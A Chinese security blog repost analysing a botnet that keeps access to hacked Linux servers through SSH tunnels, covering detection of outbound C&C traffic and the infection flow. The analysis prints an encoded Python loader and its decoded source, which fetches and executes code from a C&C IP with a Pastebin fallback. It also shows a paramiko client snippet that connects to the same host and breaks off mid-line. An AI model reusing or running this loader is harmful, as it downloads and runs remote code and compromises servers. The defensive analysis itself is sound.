记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

抓住来自SSH隧道的幽灵

2019-03-25 12:20

0x00、入侵痕迹发现

最近在安全运营过程当中,我们发现有很多挖矿或者外联C&C服务器的隐藏流量来自于标准SSH隧道。黑客入侵成功后,保持连接是他们必须要做的第一件事情。本篇文章我们从僵尸网络运营、感染流程以及安全运营防范等几个方面深度分析一下。

1、通过态势感知产品的C&C外联检测模块,发现对外可疑连接,如果对外连接IP为C&C服务器地址或者挖矿地址。证明存在异常,然后登陆服务器查看建立的连接。这里需要注意的是:主机安全在被感染前安装和之后安装,如果恶意软件在其之前安装,有可能检测手段会丧失,这时候,基于网络层面检测就起到关键作用了。

2、由于很多C&C外联只是需要上传数据的时候才产生连接,所以需要登录服务器查看具体的对外连接。图一为查询数据,图二为威胁情报报告外联ip地址为C&C僵尸网络服务器。

c2-1.jpg

c2-2_2.jpg

0x01、僵尸网络运营&感染过程

一旦黑客扫描机器人成功猜到目标Linux机器的SSH登录凭证,它将部署一个简单的base64编码的Python脚本,该脚本连接到命令和控制(C&C)服务器以获取并执行其他Python代码。

python -c import base64;exec(base64.b64decode('d2hpbGUgVHJ1ZToKCWRpcj0naHR0cDovLzIwOC45Mi4xMS4yMjo0NDMnCgliYWNrdXA9J2h0dHA6Ly9wYXN0ZWJpbi5jb20vcmF3L3lEbnpWY3h3MzQnCgl0cnk6CgkJcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYjIudXJsb3BlbihkaXIrJy9hcGk/dHlwZT1ib3QnKS5yZWFkKCkpCgkJZXhlYyhwYWdlKQoJZXhjZXB0OgoJCXRyeToKCQkJZGlyPXVybGxpYjIudXJsb3BlbihiYWNrdXApLnJlYWQoKS5zdHJpcCgpCgkJCXBhZ2U9YmFzZTY0LmI2NGRlY29kZSh1cmxsaWIyLnVybG9wZW4oZGlyKycvYXBpP3R5cGU9Ym90JykucmVhZCgpKQoJCQlleGVjKHBhZ2UpCgkJZXhjZXB0OgoJCQlwYXNzCgl0aW1lLnNsZWVwKDUwMCk='))

我们获取的早期样本:

base64部分加密代码为:

while True:
 dir='http://208.92.11.22:443'
 backup='http://pastebin.com/raw/yDnzVcxw34'
 try:
  page=base64.b64decode(urllib2.urlopen(dir+'/api?type=bot').read())
  exec(page)
 except:
  try:
   dir=urllib2.urlopen(backup).read().strip()
   page=base64.b64decode(urllib2.urlopen(dir+'/api?type=bot').read())
   exec(page)
  except:
   pass
 time.sleep(500)

网络僵尸特点:

· 基于Python脚本语言使其难以检测

· 如果原始服务器无法访问,则利用Pastebin.com接收新的命令和控制服务器(C&C)分配

· 正在挖掘罗门币,一种受网络罪犯青睐的高度匿名加密货币。(后期加装挖矿脚本)

但是攻击者需要应对的挑战之一是如何维护可持续的C&C基础架构,而不会被企业安全解决方案快速列入黑名单,或者在执法和安全供应商滥用报告之后经常被ISP和托管服务关闭。以上这种直接连接很容易被网络入侵检测系统发现。

网络犯罪分子程序又一次进化。

通过Fabric(用于简化SSH应用程序部署或系统管理任务的库和命令行工具)使用流行的Paramiko Python库来管理它的SSH连接,通过python脚本建立对外端ssh加密隧连接。

客户端:

import paramiko
import threading

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect('208.92.11.22', username='root', password='toor')
chan = client.get_transport().open_session()
chan.send('Hey i am connected 
知识来源: https://www.4hou.com/system/16963.html

阅读:49765 | 评论:0 | 标签:系统安全 SSH隧道

想收藏或者和大家分享这篇好文章→复制链接地址

“抓住来自SSH隧道的幽灵”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词